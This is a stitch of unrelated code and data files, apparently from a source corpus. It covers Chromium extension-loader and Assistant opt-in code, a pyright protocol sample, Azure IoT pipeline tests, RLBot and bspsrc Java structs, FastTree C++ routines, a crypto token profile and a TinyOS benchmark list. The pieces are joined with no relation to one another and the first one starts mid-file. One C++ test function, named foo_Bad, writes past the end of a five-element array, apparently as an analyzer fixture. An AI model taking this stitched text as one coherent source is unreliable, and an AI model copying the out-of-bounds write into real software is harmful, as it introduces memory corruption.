OnExternalProviderReady(provider_.get())) .Times(1); loader_->StartCache(base::ThreadTaskRunnerHandle::Get()); base::RunLoop().RunUntilIdle(); VerifyAndResetVisitorCallExpectations(); // Stop the cache. Verify that the loader announces an empty extension list. EXPECT_CALL(visitor_, OnExternalProviderReady(provider_.get())) .Times(1); base::RunLoop run_loop; loader_->StopCache(run_loop.QuitClosure()); VerifyAndResetVisitorCallExpectations(); // Spin the loop until the cache shutdown callback is invoked. Verify that at // that point, no further file I/O tasks are pending. run_loop.Run(); EXPECT_TRUE(base::CurrentThread::Get()->IsIdleForTesting()); } // Verifies that when a force-install list policy referencing an extension is // set and the cache is started, the loader downloads, caches and serves the // extension. TEST_F(DeviceLocalAccountExternalPolicyLoaderTest, ForceInstallListSet) { // Set a force-install list policy that contains an invalid entry (which // should be ignored) and a valid reference to an extension. SetForceInstallListPolicy(); // Start the cache. auto cache_task_runner = base::MakeRefCounted<TrackingProxyTaskRunner>( base::ThreadTaskRunnerHandle::Get()); loader_->StartCache(cache_task_runner); // Spin the loop, allowing the loader to process the force-install list. // Verify that the loader announces an empty extension list. EXPECT_CALL(visitor_, OnExternalProviderReady(provider_.get())) .Times(1); base::RunLoop().RunUntilIdle(); // Verify that a downloader has started and is attempting to download an // update manifest. EXPECT_EQ(1, test_url_loader_factory_.NumPending()); // Return a manifest to the downloader. std::string manifest; EXPECT_TRUE(base::ReadFileToString(test_dir_.Append(kExtensionUpdateManifest), &manifest)); auto* pending_request = test_url_loader_factory_.GetPendingRequest(0); test_url_loader_factory_.AddResponse(pending_request->request.url.spec(), manifest); // Wait for the manifest to be parsed. content::WindowedNotificationObserver( extensions::NOTIFICATION_EXTENSION_UPDATE_FOUND, content::NotificationService::AllSources()).Wait(); // Verify that the downloader is attempting to download a CRX file. EXPECT_EQ(1, test_url_loader_factory_.NumPending()); // Trigger downloading of the temporary CRX file. pending_request = test_url_loader_factory_.GetPendingRequest(0); test_url_loader_factory_.AddResponse(pending_request->request.url.spec(), "Content is irrelevant."); // Spin the loop. Verify that the loader announces the presence of a new CRX // file, served from the cache directory. const base::FilePath cached_crx_path = cache_dir_.Append(base::StringPrintf( "%s-%s.crx", kExtensionId, kExtensionCRXVersion)); base::RunLoop cache_run_loop; EXPECT_CALL( visitor_, OnExternalExtensionFileFound(AllOf( Field(&extensions::ExternalInstallInfoFile::extension_id, StrEq(kExtensionId)), Field(&extensions::ExternalInstallInfoFile::path, cached_crx_path), Field(&extensions::ExternalInstallInfoFile::crx_location, ManifestLocation::kExternalPolicy)))); EXPECT_CALL(visitor_, OnExternalProviderReady(provider_.get())) .Times(1) .WillOnce(InvokeWithoutArgs(&cache_run_loop, &base::RunLoop::Quit)); cache_run_loop.Run(); VerifyAndResetVisitorCallExpectations(); // Stop the cache. Verify that the loader announces an empty extension list. EXPECT_CALL(visitor_, OnExternalProviderReady(provider_.get())) .Times(1); base::RunLoop shutdown_run_loop; loader_->StopCache(shutdown_run_loop.QuitClosure()); VerifyAndResetVisitorCallExpectations(); // Spin the loop until the cache shutdown callback is invoked. Verify that at // that point, no further file I/O tasks are pending. shutdown_run_loop.Run(); EXPECT_FALSE(cache_task_runner->has_pending_tasks()); } } // namespace chromeos
5,021
2,151
<reponame>zipated/src // Copyright 2018 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "chrome/browser/ui/webui/chromeos/assistant_optin/assistant_optin_ui.h" #include <memory> #include "base/bind.h" #include "base/macros.h" #include "chrome/browser/profiles/profile.h" #include "chrome/browser/profiles/profile_manager.h" #include "chrome/browser/ui/webui/chromeos/assistant_optin/value_prop_screen_handler.h" #include "chrome/browser/ui/webui/chromeos/login/base_screen_handler.h" #include "chrome/common/url_constants.h" #include "chrome/grit/browser_resources.h" #include "chromeos/services/assistant/public/mojom/constants.mojom.h" #include "chromeos/services/assistant/public/proto/settings_ui.pb.h" #include "components/arc/arc_prefs.h" #include "components/prefs/pref_service.h" #include "content/public/browser/web_ui.h" #include "content/public/browser/web_ui_data_source.h" #include "services/service_manager/public/cpp/connector.h" namespace chromeos { namespace { bool is_active = false; constexpr int kAssistantOptInDialogWidth = 576; constexpr int kAssistantOptInDialogHeight = 480; // Construct SettingsUiSelector for the ConsentFlow UI. assistant::SettingsUiSelector GetSettingsUiSelector() { assistant::SettingsUiSelector selector; assistant::ConsentFlowUiSelector* consent_flow_ui = selector.mutable_consent_flow_ui_selector(); consent_flow_ui->set_flow_id(assistant::ActivityControlSettingsUiSelector:: ASSISTANT_SUW_ONBOARDING_ON_CHROME_OS); return selector; } // Construct SettingsUiUpdate for user opt-in. assistant::SettingsUiUpdate GetSettingsUiUpdate( const std::string& consent_token) { assistant::SettingsUiUpdate update; assistant::ConsentFlowUiUpdate* consent_flow_update = update.mutable_consent_flow_ui_update(); consent_flow_update->set_flow_id( assistant::ActivityControlSettingsUiSelector:: ASSISTANT_SUW_ONBOARDING_ON_CHROME_OS); consent_flow_update->set_consent_token(consent_token); return update; } } // namespace AssistantOptInUI::AssistantOptInUI(content::WebUI* web_ui) : ui::WebDialogUI(web_ui), weak_factory_(this) { // Set up the chrome://assistant-optin source. content::WebUIDataSource* source = content::WebUIDataSource::Create(chrome::kChromeUIAssistantOptInHost); js_calls_container_ = std::make_unique<JSCallsContainer>(); auto base_handler = std::make_unique<AssistantOptInHandler>(js_calls_container_.get()); assistant_handler_ = base_handler.get(); AddScreenHandler(std::move(base_handler)); AddScreenHandler(std::make_unique<ValuePropScreenHandler>( base::BindOnce(&AssistantOptInUI::OnExit, weak_factory_.GetWeakPtr()))); base::DictionaryValue localized_strings; for (auto* handler : screen_handlers_) handler->GetLocalizedStrings(&localized_strings); source->AddLocalizedStrings(localized_strings); source->SetJsonPath("strings.js"); source->AddResourcePath("assistant_optin.js", IDR_ASSISTANT_OPTIN_JS); source->SetDefaultResource(IDR_ASSISTANT_OPTIN_HTML); content::WebUIDataSource::Add(Profile::FromWebUI(web_ui), source); if (arc::VoiceInteractionControllerClient::Get()->voice_interaction_state() != ash::mojom::VoiceInteractionState::RUNNING) { arc::VoiceInteractionControllerClient::Get()->AddObserver(this); } else { Initialize(); } } AssistantOptInUI::~AssistantOptInUI() { arc::VoiceInteractionControllerClient::Get()->RemoveObserver(this); } void AssistantOptInUI::OnStateChanged(ash::mojom::VoiceInteractionState state) { if (state == ash::mojom::VoiceInteractionState::RUNNING) Initialize(); } void AssistantOptInUI::Initialize() { if (settings_manager_.is_bound()) return; // Set up settings mojom. Profile* const profile = Profile::FromWebUI(web_ui()); service_manager::Connector* connector = content::BrowserContext::GetConnectorFor(profile); connector->BindInterface(assistant::mojom::kServiceName, mojo::MakeRequest(&settings_manager_)); // Send GetSettings request for the ConsentFlow UI. assistant::SettingsUiSelector selector = GetSettingsUiSelector(); settings_manager_->GetSettings( selector.SerializeAsString(), base::BindOnce(&AssistantOptInUI::OnGetSettingsResponse, weak_factory_.GetWeakPtr())); } void AssistantOptInUI::AddScreenHandler( std::unique_ptr<BaseWebUIHandler> handler) { screen_handlers_.push_back(handler.get()); web_ui()->AddMessageHandler(std::move(handler)); } void AssistantOptInUI::OnExit(AssistantOptInScreenExitCode exit_code) { PrefService* prefs = Profile::FromWebUI(web_ui())->GetPrefs(); switch (exit_code) { case AssistantOptInScreenExitCode::VALUE_PROP_SKIPPED: prefs->SetBoolean(arc::prefs::kArcVoiceInteractionValuePropAccepted, false); prefs->SetBoolean(arc::prefs::kVoiceInteractionEnabled, false); CloseDialog(nullptr); break; case AssistantOptInScreenExitCode::VALUE_PROP_ACCEPTED: // Send the update to complete user opt-in. settings_manager_->UpdateSettings( GetSettingsUiUpdate(consent_token_).SerializeAsString(), base::BindOnce(&AssistantOptInUI::OnUpdateSettingsResponse, weak_factory_.GetWeakPtr())); break; default: NOTREACHED(); } } void AssistantOptInUI::OnGetSettingsResponse(const std::string& settings) { assistant::SettingsUi settings_ui; assistant::ConsentFlowUi::ConsentUi::ActivityControlUi activity_control_ui; settings_ui.ParseFromString(settings); DCHECK(settings_ui.has_consent_flow_ui()); activity_control_ui = settings_ui.consent_flow_ui().consent_ui().activity_control_ui(); consent_token_ = activity_control_ui.consent_token(); base::ListValue zippy_data; if (activity_control_ui.setting_zippy().size() == 0) { // No need to consent. Close the dialog for now. CloseDialog(nullptr); return; } for (auto& setting_zippy : activity_control_ui.setting_zippy()) { base::DictionaryValue data; data.SetString("title", setting_zippy.title()); data.SetString("description", setting_zippy.description_paragraph(0)); data.SetString("additionalInfo", setting_zippy.additional_info_paragraph(0)); data.SetString("iconUri", setting_zippy.icon_uri()); zippy_data.GetList().push_back(std::move(data)); } assistant_handler_->AddSettingZippy(zippy_data); base::DictionaryValue dictionary; dictionary.SetString("valuePropIntro", activity_control_ui.intro_text_paragraph(0)); dictionary.SetString("valuePropIdentity", activity_control_ui.identity()); dictionary.SetString("valuePropFooter", activity_control_ui.footer_paragraph(0)); dictionary.SetString( "valuePropNextButton", settings_ui.consent_flow_ui().consent_ui().accept_button_text()); dictionary.SetString( "valuePropSkipButton", settings_ui.consent_flow_ui().consent_ui().reject_button_text()); assistant_handler_->ReloadContent(dictionary); } void AssistantOptInUI::OnUpdateSettingsResponse(const std::string& result) { assistant::SettingsUiUpdateResult ui_result; ui_result.ParseFromString(result); DCHECK(ui_result.has_consent_flow_update_result()); if (ui_result.consent_flow_update_result().update_status() != assistant::ConsentFlowUiUpdateResult::SUCCESS) { // TODO(updowndta): Handle consent update failure. LOG(ERROR) << "Consent udpate error."; } // More screens to be added. Close the dialog for now. PrefService* prefs = Profile::FromWebUI(web_ui())->GetPrefs(); prefs->SetBoolean(arc::prefs::kArcVoiceInteractionValuePropAccepted, true); prefs->SetBoolean(arc::prefs::kVoiceInteractionEnabled, true); CloseDialog(nullptr); } // AssistantOptInDialog // static void AssistantOptInDialog::Show() { DCHECK(!is_active); AssistantOptInDialog* dialog = new AssistantOptInDialog(); dialog->ShowSystemDialog(true); } // static bool AssistantOptInDialog::IsActive() { return is_active; } AssistantOptInDialog::AssistantOptInDialog() : SystemWebDialogDelegate(GURL(chrome::kChromeUIAssistantOptInURL), base::string16()) { DCHECK(!is_active); is_active = true; } AssistantOptInDialog::~AssistantOptInDialog() { is_active = false; } void AssistantOptInDialog::GetDialogSize(gfx::Size* size) const { size->SetSize(kAssistantOptInDialogWidth, kAssistantOptInDialogHeight); } std::string AssistantOptInDialog::GetDialogArgs() const { return std::string(); } bool AssistantOptInDialog::ShouldShowDialogTitle() const { return false; } } // namespace chromeos
3,151
4,391
# This sample tests the provision in PEP 544 where a class type can # be assigned to a protocol. from typing import Any, Protocol class ProtoA(Protocol): def meth(_self, x: int) -> int: ... class ProtoB(Protocol): def meth(_self, self: Any, x: int) -> int: ... class C: def meth(self, x: int) -> int: ... # This should generate an error because C.meth isn't compatible # with ProtoA().meth. a: ProtoA = C b: ProtoB = C class ProtoD(Protocol): var1: int @property def var2(self) -> str: ... class E: var1: int var2: str class F: var1: int var2: int d: ProtoD = E # This should generate an error because var2 is the wrong type. e: ProtoD = F class Jumps(Protocol): def jump(self) -> int: ... class Jumper1: @classmethod def jump(cls) -> int: ... class Jumper2: def jump(self) -> int: ... def do_jump(j: Jumps): print(j.jump()) do_jump(Jumper1) do_jump(Jumper2())
428
366
# ------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # -------------------------------------------------------------------------- import inspect import pytest import functools from threading import Event from azure.iot.device.common import handle_exceptions from azure.iot.device.common.pipeline import ( pipeline_events_base, pipeline_ops_base, pipeline_stages_base, pipeline_events_mqtt, pipeline_ops_mqtt, config, ) try: from inspect import getfullargspec as getargspec except ImportError: from inspect import getargspec class StageRunOpTestBase(object): """All PipelineStage .run_op() tests should inherit from this base class. It provides basic tests for dealing with exceptions. """ @pytest.mark.it( "Completes the operation with failure if an unexpected Exception is raised while executing the operation" ) def test_completes_operation_with_error(self, mocker, stage, op, arbitrary_exception): stage._run_op = mocker.MagicMock(side_effect=arbitrary_exception) stage.run_op(op) assert op.completed assert op.error is arbitrary_exception @pytest.mark.it( "Allows any BaseException that was raised during execution of the operation to propogate" ) def test_base_exception_propogates(self, mocker, stage, op, arbitrary_base_exception): stage._run_op = mocker.MagicMock(side_effect=arbitrary_base_exception) with pytest.raises(arbitrary_base_exception.__class__) as e_info: stage.run_op(op) assert e_info.value is arbitrary_base_exception class StageHandlePipelineEventTestBase(object): """All PipelineStage .handle_pipeline_event() tests should inherit from this base class. It provides basic tests for dealing with exceptions. """ @pytest.mark.it( "Sends any unexpected Exceptions raised during handling of the event to the background exception handler" ) def test_uses_background_exception_handler(self, mocker, stage, event, arbitrary_exception): stage._handle_pipeline_event = mocker.MagicMock(side_effect=arbitrary_exception) mocker.spy(handle_exceptions, "handle_background_exception") stage.handle_pipeline_event(event) assert handle_exceptions.handle_background_exception.call_count == 1 assert handle_exceptions.handle_background_exception.call_args == mocker.call( arbitrary_exception ) @pytest.mark.it("Allows any BaseException raised during handling of the event to propogate") def test_base_exception_propogates(self, mocker, stage, event, arbitrary_base_exception): stage._handle_pipeline_event = mocker.MagicMock(side_effect=arbitrary_base_exception) with pytest.raises(arbitrary_base_exception.__class__) as e_info: stage.handle_pipeline_event(event) assert e_info.value is arbitrary_base_exception
1,045
408
package rlbot.gamestate; import com.google.flatbuffers.FlatBufferBuilder; import rlbot.flat.DesiredPhysics; import rlbot.vector.Vector3; /** * See https://github.com/RLBot/RLBotJavaExample/wiki/Manipulating-Game-State */ public class PhysicsState { private DesiredVector3 location; private DesiredRotation rotation; private DesiredVector3 velocity; private DesiredVector3 angularVelocity; public PhysicsState() { } public PhysicsState(DesiredVector3 location, DesiredRotation rotation, DesiredVector3 velocity, DesiredVector3 angularVelocity) { this.location = location; this.rotation = rotation; this.velocity = velocity; this.angularVelocity = angularVelocity; } public DesiredVector3 getLocation() { return location; } public PhysicsState withLocation(DesiredVector3 location) { this.location = location; return this; } public DesiredRotation getRotation() { return rotation; } public PhysicsState withRotation(DesiredRotation rotation) { this.rotation = rotation; return this; } public DesiredVector3 getVelocity() { return velocity; } public PhysicsState withVelocity(DesiredVector3 velocity) { this.velocity = velocity; return this; } public DesiredVector3 getAngularVelocity() { return angularVelocity; } public PhysicsState withAngularVelocity(DesiredVector3 angularVelocity) { this.angularVelocity = angularVelocity; return this; } public int toFlatbuffer(FlatBufferBuilder builder) { Integer locationOffset = location == null ? null : location.toFlatbuffer(builder); Integer rotationOffset = rotation == null ? null : rotation.toFlatbuffer(builder); Integer velocityOffset = velocity == null ? null : velocity.toFlatbuffer(builder); Integer angularVelocityOffset = angularVelocity == null ? null : angularVelocity.toFlatbuffer(builder); DesiredPhysics.startDesiredPhysics(builder); if (locationOffset != null) { DesiredPhysics.addLocation(builder, locationOffset); } if (rotationOffset != null) { DesiredPhysics.addRotation(builder, rotationOffset); } if (velocityOffset != null) { DesiredPhysics.addVelocity(builder, velocityOffset); } if (angularVelocityOffset != null) { DesiredPhysics.addAngularVelocity(builder, angularVelocityOffset); } return DesiredPhysics.endDesiredPhysics(builder); } }
970
348
{"nom":"Fontenois-lès-Montbozon","dpt":"Haute-Saône","inscrits":212,"abs":28,"votants":184,"blancs":6,"nuls":18,"exp":160,"res":[{"panneau":"1","voix":82},{"panneau":"2","voix":78}]}
79
777
// Copyright (c) 2012 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef CHROME_TEST_CHROMEDRIVER_CHROME_CHROME_IMPL_H_ #define CHROME_TEST_CHROMEDRIVER_CHROME_CHROME_IMPL_H_ #include <list> #include <memory> #include <string> #include "base/compiler_specific.h" #include "base/memory/linked_ptr.h" #include "base/memory/scoped_vector.h" #include "chrome/test/chromedriver/chrome/chrome.h" struct BrowserInfo; class DevToolsClient; class DevToolsEventListener; class DevToolsHttpClient; class PortReservation; class Status; class WebView; class WebViewImpl; class WebViewsInfo; class ChromeImpl : public Chrome { public: ~ChromeImpl() override; // Overridden from Chrome: Status GetAsDesktop(ChromeDesktopImpl** desktop) override; const BrowserInfo* GetBrowserInfo() const override; bool HasCrashedWebView() override; Status GetWebViewIdForFirstTab(std::string* web_view_id, bool w3c_complaint) override; Status GetWebViewIds(std::list<std::string>* web_view_ids, bool w3c_compliant) override; Status GetWebViewById(const std::string& id, WebView** web_view) override; Status CloseWebView(const std::string& id) override; Status ActivateWebView(const std::string& id) override; bool IsMobileEmulationEnabled() const override; bool HasTouchScreen() const override; std::string page_load_strategy() const override; Status Quit() override; protected: ChromeImpl(std::unique_ptr<DevToolsHttpClient> http_client, std::unique_ptr<DevToolsClient> websocket_client, ScopedVector<DevToolsEventListener>& devtools_event_listeners, std::unique_ptr<PortReservation> port_reservation, std::string page_load_strategy); virtual Status QuitImpl() = 0; bool quit_; std::unique_ptr<DevToolsHttpClient> devtools_http_client_; std::unique_ptr<DevToolsClient> devtools_websocket_client_; private: typedef std::list<linked_ptr<WebViewImpl> > WebViewList; void UpdateWebViews(const WebViewsInfo& views_info, bool w3c_compliant); // Web views in this list are in the same order as they are opened. WebViewList web_views_; ScopedVector<DevToolsEventListener> devtools_event_listeners_; std::unique_ptr<PortReservation> port_reservation_; std::string page_load_strategy_; }; #endif // CHROME_TEST_CHROMEDRIVER_CHROME_CHROME_IMPL_H_
875
14,499
/* * Copyright (c) Facebook, Inc. and its affiliates. * * This source code is licensed under the MIT license found in the * LICENSE file in the root directory of this source tree. */ #include <vector> struct S { std::vector<int> l; S* next; std::atomic<void*> ptr; }; class C { void foo_Bad(); void goo(); S head_; }; void C::foo_Bad() { while (1) { S* t = head_.next; int x = t->l.size(); void* ptr = t->ptr; int a[5]; a[10] = 1; } } void C::goo() { while (1) { S* t = head_.next; int x = t->l.size(); void* ptr = t->ptr; } }
250
8,130
<filename>src/Native/FastTreeNative/SumupSegment.h //------------------------------------------------------------------------------ // <copyright company="Microsoft Corporation"> // Copyright (c) Microsoft Corporation. All rights reserved. // </copyright> //------------------------------------------------------------------------------ template<class FloatT, class FloatT2> void SumupSegment_noindices(_In_ uint32_t* pData, _In_ uint8_t* pSegType, _In_ int32_t* pSegLength, _In_reads_(origSampleSize) FloatT* pSampleOutputs, #ifdef IsWeighted _In_reads_(origSampleSize) FloatT2* pSampleOutputWeights, #endif _Inout_ FloatT* pSumOutputsByBin, #ifdef IsWeighted _Inout_ FloatT2* pSumWeightsByBin, #endif _Inout_ int32_t* pCountByBin, _In_ int32_t origSampleSize) { // Sumup over all values. uint64_t workingBits = pData[0] | ((uint64_t)pData[1] << 32); int bitsOffset = 0; pData += 2; FloatT* pSampleEnd = pSampleOutputs + origSampleSize; while (pSampleOutputs < pSampleEnd) { int32_t segEnd = *(pSegLength++); int8_t segType = *(pSegType++); uint32_t mask = ~((-1) << segType); while (segEnd-- > 0) { int32_t featureBin = (int32_t)((workingBits >> bitsOffset)&mask); pSumOutputsByBin[featureBin] += *(pSampleOutputs++); #ifdef IsWeighted pSumWeightsByBin[featureBin] += *(pSampleOutputWeights++); #endif pCountByBin[featureBin]++; bitsOffset += segType; if (bitsOffset >= 32) { workingBits = (workingBits >> 32) | (((uint64_t)*(pData++)) << 32); bitsOffset &= 31; } } } } template<class FloatT, class FloatT2> void SumupSegment(_In_ uint32_t* pData, _In_ uint8_t* pSegType, _In_ int32_t* pSegLength, _In_reads_(origSampleSize) int32_t* pIndices, _In_reads_(origSampleSize) FloatT* pSampleOutputs, #ifdef IsWeighted _In_reads_(origSampleSize) FloatT2* pSampleOutputWeights, #endif _Inout_ FloatT* pSumOutputsByBin, #ifdef IsWeighted _Inout_ FloatT2* pSumWeightsByBin, #endif _Inout_ int32_t* pCountByBin, _In_ int32_t origSampleSize) { if (pIndices == nullptr) { SumupSegment_noindices<FloatT, double> #ifdef IsWeighted (pData, pSegType, pSegLength, pSampleOutputs, pSampleOutputWeights, pSumOutputsByBin, pSumWeightsByBin, pCountByBin, origSampleSize); #else (pData, pSegType, pSegLength, pSampleOutputs, pSumOutputsByBin, pCountByBin, origSampleSize); #endif return; } int64_t globalBitOffset = 0; int32_t currIndex = 0, segEnd = *(pSegLength++); int32_t nextIndex = segEnd; int8_t segType = *(pSegType++); uint32_t mask = ~((-1) << segType); FloatT* pSampleEnd = pSampleOutputs + origSampleSize; while (pSampleOutputs < pSampleEnd) { int index = *(pIndices++); while (index >= nextIndex) { globalBitOffset += __emulu((unsigned int)segEnd, (unsigned int)segType); currIndex = nextIndex; nextIndex += (segEnd = *(pSegLength++)); mask = ~((-1) << (segType = *(pSegType++))); } int64_t bitOffset = globalBitOffset + __emul(index - currIndex, (int)segType); int32_t major = (int32_t)(bitOffset >> 5), minor = (int32_t)(bitOffset & 0x1f); int32_t featureBin = (((uint64_t)pData[major] >> minor) | ((uint64_t)pData[major + 1] << (32 - minor)))&mask; pSumOutputsByBin[featureBin] += *(pSampleOutputs++); #ifdef IsWeighted pSumWeightsByBin[featureBin] += *(pSampleOutputWeights++); #endif pCountByBin[featureBin]++; } }
1,632
428
<reponame>SmileyAG/bspsrc /* ** 2011 April 5 ** ** The author disclaims copyright to this source code. In place of ** a legal notice, here is a blessing: ** May you do good and not evil. ** May you find forgiveness for yourself and forgive others. ** May you share freely, never taking more than you give. */ package info.ata4.bsplib.struct; import info.ata4.bsplib.vector.Vector3f; import info.ata4.io.DataReader; import info.ata4.io.DataWriter; import java.io.IOException; /** * Overlay data structure. * * @author <NAME> <barracuda415 at yahoo.de> */ public class DOverlay implements DStruct { public static final int OVERLAY_BSP_FACE_COUNT = 64; public static final int OVERLAY_RENDER_ORDER_NUM_BITS = 2; public static final int OVERLAY_RENDER_ORDER_MASK = 0xC000; // top 2 bits set public int id; public short texinfo; public int faceCountAndRenderOrder; public int[] ofaces = new int[OVERLAY_BSP_FACE_COUNT]; public float[] u = new float[2]; public float[] v = new float[2]; public Vector3f[] uvpoints = new Vector3f[4]; public Vector3f origin; public Vector3f basisNormal; public int getFaceCount() { return faceCountAndRenderOrder & ~OVERLAY_RENDER_ORDER_MASK; } public int getRenderOrder() { return faceCountAndRenderOrder >> (16 - OVERLAY_RENDER_ORDER_NUM_BITS); } @Override public int getSize() { return 352; } @Override public void read(DataReader in) throws IOException { id = in.readInt(); texinfo = in.readShort(); faceCountAndRenderOrder = in.readUnsignedShort(); for (int j = 0; j < OVERLAY_BSP_FACE_COUNT; j++) { ofaces[j] = in.readInt(); } u[0] = in.readFloat(); u[1] = in.readFloat(); v[0] = in.readFloat(); v[1] = in.readFloat(); for (int j = 0; j < 4; j++) { uvpoints[j] = Vector3f.read(in); } origin = Vector3f.read(in); basisNormal = Vector3f.read(in); } @Override public void write(DataWriter out) throws IOException { out.writeInt(id); out.writeShort(texinfo); out.writeUnsignedShort(faceCountAndRenderOrder); for (int j = 0; j < OVERLAY_BSP_FACE_COUNT; j++) { out.writeInt(ofaces[j]); } out.writeFloat(u[0]); out.writeFloat(u[1]); out.writeFloat(v[0]); out.writeFloat(v[1]); for (int j = 0; j < 4; j++) { Vector3f.write(out, origin); } } }
1,218
764
<reponame>dchain01/token-profile { "symbol": "ST", "address": "0x744E098e9d3FA11D96C2860B49D33f46dd2Ae167", "overview": { "en": "StatEX is a comprehensive service platform that integrates transaction, storage and financial management. It provides spot and derivative trading services for digital assets such as Bitcoin and ETF to users around the world. The aim is to construct a decentralized business ecosystem, connecting the value of digital assets and real business, connecting the various ecological chains, perfectly combining offline experiential services with block chain Internet finance, and realizing the block chain transformation of business services for the vast number of users.", "zh": "StatEX是一个集交易、存储以及理财为一体的综合性服务平台,向全球用户提供比特币、以太坊等数字资产的现货和衍生品交易服务。旨在构建一个去中心化的商业生态圈,通过打通数字资产与实体商业的价值对接,连接各生态链,将线下体验式服务与区块链互联网金融完美结合,为广大用户实现商业服务的区块链转型。" }, "email": "<EMAIL>", "website": "http://statex.co", "whitepaper": "https://s3-ap-southeast-1.amazonaws.com/statex/whitepaper.pdf", "state": "NORMAL", "published_on": "2019-01-30", "initial_price": { "ETH": "0.0005 ETH", "USD": "0.07142 USD" } }
642
11,356
/* Copyright © 2020 Apple Inc. All rights reserved. * * Use of this source code is governed by a BSD-3-clause license that can * be found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause */ #pragma once #if __cplusplus > 201103L #include <experimental/type_traits> #else // this is a C++11 implementation for std::experimental::detail (see online cppreference // for full details). // // this enables static interface testing for the presence of functions and methods. // // impl reference: https://people.eecs.berkeley.edu/~brock/blog/detection_idiom.php namespace std { template <class...> using void_t = void; namespace experimental { struct nonesuch { ~nonesuch() = delete; nonesuch(nonesuch const&) = delete; void operator=(nonesuch const&) = delete; }; namespace detail { template <class Default, class AlwaysVoid, template <class...> class Op, class... Args> struct detector { using value_t = std::false_type; using type = Default; }; template <class Default, template <class...> class Op, class... Args> struct detector<Default, std::void_t<Op<Args...> >, Op, Args...> { using value_t = std::true_type; using type = Op<Args...>; }; } // namespace detail template <template <class...> class Op, class... Args> using is_detected = typename detail::detector<nonesuch, void, Op, Args...>::value_t; } // namespace experimental } // namespace std #endif
455
1,053
/** * User Defined Benchmark Database file * ------------------------------------------------------------------------ * * This is a user-modifiable file, keep it clean, and stay to the rules below. * * Instructions for how to define a benchmark: * 1, All benchmarks MUST begin with a _BMARK_START_(X) macro, where X is its unique identifier. * Note that if multiple benchmarks have the same id, only the first is seen by the program, * others are ignored -- thus only eating expensive memory. * Valid ids are from [200,...,255], lower values are reserved for standard benchmarks. * * 2, All benchmarks MUST end with a _BMARK_END_ macro. * 3, Between these macros, the edges (allowed communication links between two) * separate motes) of the modeled network are enlisted. * * Each edge is a 7-element structure : * { SENDER, RECEIVER, TIMER_DESC, POLICY_DESC, MSG_COUNT, REPLY, 'START_MSG_ID' } * * 4, SENDER: - any positive number, denoting the mote id * RECEIVER: - any positive number other than the sender, denoting the mote id, * - 'ALL', denoting all motes. This automatically implies * that on this edge, broadcasting is used * * TIMER_DESC: * - 'NO_TIMER', if timers are not used on this edge * - {START_TIMER_DESC, STOP_TIMER_DESC} otherwise * * START_TIMER_DESC: * STOP_TIMER_DESC: * - '0', if sending/stopping is not initiated by a timer * - 'TIMER(X)', representing the Xth timer, ex: TIMER(2) * * POLICY_DESC: * - { SEND_TRIG, STOP_TRIG, ACK, 0, 0 } * SEND_TRIG: - 'SEND_ON_REQ', to send only if implicitly required (see below) * - 'SEND_ON_INIT', to send message on benchmark start, * - 'SEND_ON_TIMER', to send message on timer event ( * see START_TIMER_DESC) * STOP_TRIG: - '0', if no message sending stopper is required * - 'STOP_ON_ACK', if message sending is required to stop on an ACK * - 'STOP_ON_TIMER', if message sending is req. to stop on a timer event ( * see STOP_TIMER_DESC) * ACK: - '0', if acknowledgements are not requested * - 'NEED_ACK', if acknowledgements are requested * * MSG_COUNT: - NUM(X), denoting X message(s) to send, where X can be from [1,..,255]. * - NUM(INFINITE), denoting continous message sending. * * REPLY: - 'NO_REPLY', if message is not required to send on reception * - 'REPLY_EDGE(X)', if message is to send on reception on edge X. * - 'REPLY_EDGE(X) | REPLY_EDGE(Y) | ...', if message is to send on reception * on edge X AND on edge Y also. * (the edge ids count from zero in the current benchmark) * * By specifying the edges, the required mote count is implicitly determined by the maximal mote id * present either in the sender or receiver sections of the edge descriptions. (This can aslo be * overridden with a command line option (-mc) of the PC program. ) * * In the following example, the implied mote count is 1: * _BMARK_START_(202) * { 1, ALL, NO_TIMER , ... } * _BMARK_END_ * * However, if someone would like to increase this number (ex. to 4), there is a naughty trick: * _BMARK_START_(202) * { 4, ALL, NO_TIMER , ... } * _BMARK_END_ * * You are encouraged to use this motecount-force, rather than depending on the command-line option. * * For complete examples, see the demo benchmarks below. * These benchmarks are only for demo and reference purposes, so do not hesitate to erase them / comment them out to reduce the memory overhead. * */ // Send 10 messages (Mote1 -> Mote 2) when the test starts, and that's it. _BMARK_START_(200) { 1, 2, NO_TIMER , { SEND_ON_INIT, 0, 0, 0, 0 }, NUM(10), NO_REPLY, START_MSG_ID } _BMARK_END_ // Send 10 messages (Mote2 -> Mote 1) when the test starts, and that's it. _BMARK_START_(201) { 2, 1, NO_TIMER , { SEND_ON_INIT, 0, 0, 0, 0 }, NUM(10), NO_REPLY, START_MSG_ID } _BMARK_END_ /* Send 10 broadcast messages when the test starts. * Note: try this benchmark with different motecount options on the PC side * - if motecount is set to 1 (default for this benchmark), no reception is seen in receiver side stats, * - if motecount is set to 2 (-mc 2): 10 reception (Mote 2 is now present, hearing Mote 1), * - if motecount is set to 5 (-mc 5): 40 reception (Mote 2,3,4,5 are present, hearing Mote 1), * - ... */ _BMARK_START_(202) { 1, ALL, NO_TIMER , { SEND_ON_INIT, 0, 0, 0, 0 }, NUM(10), NO_REPLY, START_MSG_ID } _BMARK_END_ // Send 10 messages when the test starts, and request acks. _BMARK_START_(203) { 1, 2, NO_TIMER , { SEND_ON_INIT, 0, NEED_ACK, 0, 0 }, NUM(10), NO_REPLY, START_MSG_ID } _BMARK_END_ // Send a message and request ack for it. If not acked, fallback at most 5 times. _BMARK_START_(204) { 1, 2, NO_TIMER , { SEND_ON_INIT, STOP_ON_ACK, NEED_ACK, 0, 0 }, NUM(5), NO_REPLY, START_MSG_ID } _BMARK_END_ // Mote 1 sends 3 messages to Mote 2. // Mote 2 sends messages to Mote1, stops when ack received and sends at most 7 messages if no ack received. _BMARK_START_(205) { 1, 2, NO_TIMER , { SEND_ON_INIT, 0, 0, 0, 0 }, NUM(3), NO_REPLY, START_MSG_ID }, { 2, 1, NO_TIMER , { SEND_ON_INIT, STOP_ON_ACK, NEED_ACK, 0, 0 }, NUM(7), NO_REPLY, START_MSG_ID } _BMARK_END_ // Start sending continously messages when the test starts. Message sending stops when the test stops. 